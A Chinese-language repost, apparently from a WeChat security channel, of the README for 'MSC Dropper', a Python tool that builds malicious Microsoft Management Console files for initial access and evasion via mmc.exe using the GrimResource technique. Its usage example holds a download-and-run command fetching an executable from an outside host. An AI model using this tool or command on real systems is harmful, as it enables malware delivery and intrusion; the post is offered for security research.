MSC Dropper 工具
MSC Dropper 是一个 Python 脚本,旨在自动创建带有可自定义有效负载的 MSC(Microsoft 管理控制台)文件,以实现任意执行。此工具利用了 Elastic Security Labs 的 Samir (@SBousseaden) 发现的一种方法,称为 #GrimResource,该方法有助于通过 进行初始访问和规避mmc.exe。
概述
该脚本允许用户生成可在 Microsoft 管理控制台环境中执行任意命令或脚本的 MSC 文件。此功能对于安全研究和测试环境特别有用。
特征
安装
克隆存储库:
git clone https://github.com/ZERODETECTION/MSC_Dropper.git
用法
-
生成 MSC 文件
要使用特定命令或脚本生成 MSC 文件:
python msc_dropper.py template1.msc out.msc "cmd /c curl -O http://wslab.de/tools/messagebox.exe && messagebox.exe"
替换"cmd /c curl -O http://wslab.de/tools/messagebox.exe && messagebox.exe"为您要执行的命令或脚本。确保命令格式正确,可以在 Windows 环境中运行mmc.exe。
自定义有效载荷
您可以直接在文件中自定义有效载荷template1.msc或修改脚本以自动生成更复杂的有效载荷。
致谢
Elastic Security Labs 的 Samir (@SBousseaden) 发现了涉及的初始访问和逃避方法mmc.exe。
https://github.com/ZERODETECTION/MSC_Dropper
原文始发于微信公众号(Ots安全):自定义恶意payload 的 MSC(Microsoft 管理控制台)文件以供任意执行
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论